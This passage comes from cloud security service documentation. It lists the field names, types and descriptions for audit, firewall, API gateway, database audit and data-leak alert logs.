Total OTHER traffic to the target (in kbps) |
syn_pps |
String |
Number of SYN packets to the target (in pps) |
synack_pps |
String |
Number of SYN/ACK packets to the target (in pps) |
ack_pps |
String |
Rate of ACK packets to the target (in pps) |
finrst_pps |
String |
Rate of FIN/Rst packets to the target (in pps) |
http_pps |
String |
Rate of HTTP packets to the target (in pps) |
http_kbps |
String |
Rate of HTTP traffic to the target (in kbps) |
http_get_pps |
String |
Total packet rate of HTTP requests to the target (in pps) |
https_pps |
String |
Rate of HTTPS packets to the target (in pps) |
https_kbps |
String |
Rate of HTTPS traffic to the target (in kbps) |
dns_request_pps |
String |
Rate of DNS Query packets to the target (in pps) |
dns_request_kbps |
String |
Rate of DNS Query traffic to the target (in kbps) |
dns_reply_pps |
String |
Rate of DNS Reply packets to the target (in pps) |
dns_reply_kbps |
String |
Rate of DNS Reply traffic to the target (in kbps) |
sip_invite_pps |
String |
Rate of SIP packets to the target (in PPS). |
sip_invite_kbps |
String |
Rate of SIP traffic to the target (in kbps) |
tcp_increase_con |
String |
Number of new TCP connections to the target per second |
udp_increase_con |
String |
Number of new UDP connections to the target per second |
icmp_increase_con |
String |
Number of new ICMP connections to the target per second |
other_increase_con |
String |
Number of OTHER connections to the target per second |
tcp_concur_con |
String |
Number of concurrent TCP connections to the target |
udp_concur_con |
String |
Number of concurrent UDP connections to the target |
icmp_concur_con |
String |
Number of concurrent ICMP connections to the target |
other_concur_con |
String |
Number of concurrent OTHER connections to the target |
total_average_pps |
String |
Average pps of all traffic to the target |
total_average_kbps |
String |
Average Kbps of all traffic to the target |
sec-cts-audit
Fields in CTS logs
Field |
Type |
Description |
---|---|---|
time |
Date |
Time when an incident occurs. The value is the local standard time (GMT+local time zone), for example, 2022/11/08 11:24:04 GMT+08:00. |
user |
Object |
Cloud account used to perform the recorded operation. |
request |
Object |
Requested operation. |
response |
Object |
Response to the request. |
service_type |
String |
Operation source. |
resource_type |
String |
Resource type. |
resource_name |
String |
Resource name. |
resource_id |
String |
Unique resource ID. |
source_ip |
String |
IP address of the user who performs an operation. The value of this parameter is empty if the operation is triggered by the system. |
trace_name |
String |
Operation name. |
trace_rating |
String |
Level of an operation incident. The options are as follows:
|
trace_type |
String |
Operation type. The options are as follows:
|
api_version |
String |
API version of the cloud service on which an operation was performed. |
message |
Object |
Supplementary information. |
record_time |
Long |
Time when the operation was recorded, in the form of a timestamp. |
trace_id |
String |
Unique operation ID. |
code |
Integer |
HTTP return code, for example, 200 or 400. |
request_id |
String |
Request ID. |
location_info |
String |
Additional information required for fault locating after a request error. |
endpoint |
String |
Endpoint of the page that displays details of cloud resources involved in this operation. |
resource_url |
String |
Access link (excluding the endpoint) of the page that displays details of cloud resources involved in this operation. |
user_agent |
String |
Type of OBS bucket-related operations that are not invoked using OBS SDKs. |
content_length |
Long |
Length of the request body for performing operations on OBS buckets. |
total_time |
Long |
Response time of the request in OBS bucket-related operations. |
sec-cfw-risk
Fields in CFW attack event logs
Field |
Type |
Description |
---|---|---|
event_time |
Date |
Attack time |
action |
String |
Response action of CFW
|
app |
String |
Application type |
attack_rule |
String |
Defense rule that works for the detected attack |
attack_rule_id |
String |
ID of the defense rule that works for the detected attack |
attack_type |
String |
Type of the attack
|
dst_ip |
String |
Destination IP address |
dst_port |
String |
Destination port number |
packet |
String |
Original data packet of the attack log |
protocol |
String |
Protocol type |
level |
String |
Level of detected threats
|
source |
String |
Defense for the detected attack
|
src_ip |
String |
Source IP address |
src_port |
String |
Source port number |
direction |
String |
Flow direction
|
sec-cfw-flow
Fields in CFW traffic logs
Field |
Type |
Description |
---|---|---|
app |
String |
Application type |
dst_ip |
String |
Destination IP address |
dst_port |
String |
Destination port number |
end_time |
Date |
Flow end time |
protocol |
String |
Protocol type |
to_c_bytes |
String |
Number of bytes sent from the server to the client |
to_c_pkts |
String |
Number of packets sent from the server to the client |
to_s_bytes |
String |
Number of bytes sent from the client to the server |
to_s_pkts |
String |
Number of packets sent from the server to the client |
src_ip |
String |
Source IP address |
src_port |
String |
Source port number |
start_time |
Date |
Flow start time |
sec-cfw-block
Fields in CFW access control logs
Field |
Type |
Description |
---|---|---|
hit_time |
Date |
Time of access |
action |
String |
Response action of CFW
|
app |
String |
Application type |
dst_ip |
String |
Destination IP address |
dst_port |
String |
Destination port number |
protocol |
String |
Protocol type |
rule_id |
String |
ID of the triggering rule |
src_ip |
String |
Source IP address |
src_port |
String |
Source port number |
sec-apig-access
Fields in API Gateway access logs
Field |
Type |
Description |
---|---|---|
region_id |
String |
Site. |
api_id |
String |
API ID. |
body_bytes_sent |
String |
Response body size. |
bytes_sent |
String |
Size of the entire response. |
domain |
String |
Public network domain name. |
errorType |
String |
Status of request throttling. Value 1 indicates that request throttling is enabled. |
http_user_agent |
String |
User agent ID. |
http_x_forwarded_for |
String |
X-Forwarded-For header. |
opsuba_api_url |
String |
Request URI. |
out_times |
String |
Time required for interaction between the gateway and peripheral components. |
remote_addr |
String |
Remote IP address. |
request_id |
String |
Request ID. |
request_length |
String |
Size of the entire request. |
request_method |
String |
HTTP request method. |
request_time |
String |
Time required for access. |
scheme |
String |
Protocol. |
server_protocol |
String |
Request protocol. |
status |
String |
Status. |
time_local |
Date |
Time. |
upstream_addr |
String |
Remote IP address. |
upstream_connect_time |
String |
Time required for a remote connection. |
upstream_header_time |
String |
Time required for receiving the header at the remote end. |
upstream_response_time |
String |
Time required for returning a response from the remote end. |
upstream_status |
String |
Remote status. |
upstream_uri |
String |
Request backend URI. |
user_name |
String |
Project ID or app ID of the user. |
sec-dbss-alarm
Fields in DBSS alert logs
Field |
Type |
Description |
|
---|---|---|---|
domain_id |
String |
Account ID. |
|
project_id |
String |
Project ID |
|
region |
String |
Region |
|
tenant_vpc_id |
String |
VPC ID of the tenant |
|
tenant_subnet_id |
String |
Subnet ID of the tenant |
|
instance_id |
String |
Instance ID |
|
instance_name |
String |
Instance name |
|
alarm |
Object |
Alert object |
|
source_type |
String |
DBSS |
|
alarm |
alarm_risk |
String |
Severity |
client_ip |
String |
Connection IP address |
|
database_ip |
String |
IP address for accessing the database |
|
count |
Long |
Number of alerts |
|
user_name |
String |
Database username |
|
schema |
String |
Oracle schema |
|
rule_name |
String |
Rule name |
|
rule_id |
String |
Rule ID |
|
sql_type |
String |
SQL execution type |
|
sql_result |
String |
SQL execution result |
|
db_type |
String |
Database type |
sec-dsc-alarm
The reserved fields in DSC alert logs vary depending on the log types.
Field |
Type |
Description |
---|---|---|
log_type |
String |
Alert type |
region_id |
String |
Region |
domain_id |
String |
Account ID. |
project_id |
String |
Project ID |
leakage_ak |
String |
AK |
source |
String |
Leakage source |
find_time |
String |
Discovery time |
account |
String |
Account name. |
file_name |
String |
File name |
file_suffix |
String |
File name extension |
leakage_user_id |
String |
Sub-user ID of the leakage |
leakage_user_name |
String |
Sub-username of the leakage |
leakage_domain_id |
String |
Leaked account ID. |
leakage_domain_name |
String |
Leaked account name. |
url |
String |
Website URL of the leakage |
Field |
Type |
Description |
---|---|---|
log_type |
String |
Alert type |
region_id |
String |
Region |
domain_id |
String |
Account ID. |
project_id |
String |
Project ID |
bucket_policy |
String |
Public bucket/Private bucket |
bucket_domain_id |
String |
ID of the account that the bucket belongs to. |
bucket_project_id |
String |
ID of the project to which the bucket belongs |
bucket_name |
String |
Bucket name |
file_name |
String |
File name |
file_path |
String |
File path |
risk_level |
Integer |
Sensitive risk level |
sensitive_data_type |
String[] |
Sensitive data type |
privacy_detail |
String |
Personal privacy data details |
file_type |
String |
File type |
mimetypes |
String |
File type |
rule_list |
List<Map<String,String>> |
List of matched rules |
keyword |
String |
Keyword for matching sensitive data rules |
available_zone |
String |
AZ |
encrypted |
String |
Whether to encrypt data |
Field |
Type |
Description |
---|---|---|
log_type |
String |
Alert type |
region_id |
String |
Region |
domain_id |
String |
Account ID. |
project_id |
String |
Project ID |
vpc_id |
String |
VPC ID |
db_instance_type |
String |
RDS PUB |
db_instance_id |
String |
Database instance ID |
db_instance_type |
String |
Database instance type |
db_instance_ip |
String |
IP address of the database instance |
db_instance_domain_id |
String |
ID of the account that the database instance belongs to. |
db_instance_project_id |
String |
ID of the project to which the database instance belongs |
db_instance_name |
String |
Database instance name |
db_name |
String |
Database name |
table_name |
String |
Table name |
field_name |
String |
Field name |
data_type |
String |
Field data type |
risk_level |
Integer |
Sensitive risk level |
sensitive_data_type |
String[] |
Sensitive data type |
privacy_detail |
String |
Personal privacy data details |
rule_list |
List<Map<String,String>> |
List of matched rules |
keyword |
String |
Keyword for matching sensitive data rules |
Feedback
Was this page helpful?
Provide feedbackThank you very much for your feedback. We will continue working to improve the documentation.